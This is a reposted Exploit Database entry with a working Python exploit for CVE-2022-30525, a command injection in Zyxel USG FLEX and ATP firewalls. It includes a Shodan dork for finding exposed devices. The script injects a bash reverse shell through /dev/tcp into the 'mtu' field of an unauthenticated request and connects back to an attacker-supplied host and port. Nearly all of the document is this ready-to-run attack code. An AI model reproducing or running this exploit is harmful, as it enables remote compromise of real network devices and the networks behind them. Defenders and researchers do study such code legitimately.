Zyxel USG FLEX 5.21 – OS Command Injection

• Exploit Database
• 12 阅读

• 作者： Valentin Lobstein
  日期： 2022-06-03
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50946/

• # Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
  # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
  # Date: May 18th 2022
  # Exploit Author: Valentin Lobstein
  # Vendor Homepage: https://www.zyxel.com
  # Version: ZLD5.00 thru ZLD5.21
  # Tested on: Linux
  # CVE: CVE-2022-30525
  
  
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  import sys
  import json
  import base64
  import requests
  import argparse
  
  
  parser = argparse.ArgumentParser(
  prog="CVE-2022-30525.py",
  description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
  )
  parser.add_argument("-u", dest="url", help="Specify target URL")
  parser.add_argument("-r", dest="host", help="Specify Remote host")
  parser.add_argument("-p", dest="port", help="Specify Remote port")
  
  args = parser.parse_args()
  
  banner = (
  "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
  "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
  "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
  "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
  "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
  "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
  "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
  "biA6KSApCg=="
  )
  
  
  def main():
  
  print("\n" + base64.b64decode(banner).decode("utf-8"))
  
  if None in vars(args).values():
  print(f"[!] Please enter all parameters !")
  parser.print_help()
  sys.exit()
  
  if "http" not in args.url:
  args.url = "https://" + args.url
  args.url += "/ztp/cgi-bin/handler"
  exploit(args.url, args.host, args.port)
  
  
  def exploit(url, host, port):
  headers = {
  "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
  "Content-Type": "application/json",
  }
  
  data = {
  "command": "setWanPortSt",
  "proto": "dhcp",
  "port": "4",
  "vlan_tagged": "1",
  "vlanid": "5",
  "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
  "data": "hi",
  }
  requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
  
  try:
  response = requests.post(
  url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
  )
  except (KeyboardInterrupt, requests.exceptions.Timeout):
  print("[!] Bye Bye hekcer !")
  sys.exit(1)
  finally:
  
  try:
  print("[!] Can't exploit the target ! Code :", response.status_code)
  
  except:
  print("[!] Enjoy your shell !!!")
  
  
  if __name__ == "__main__":
  main()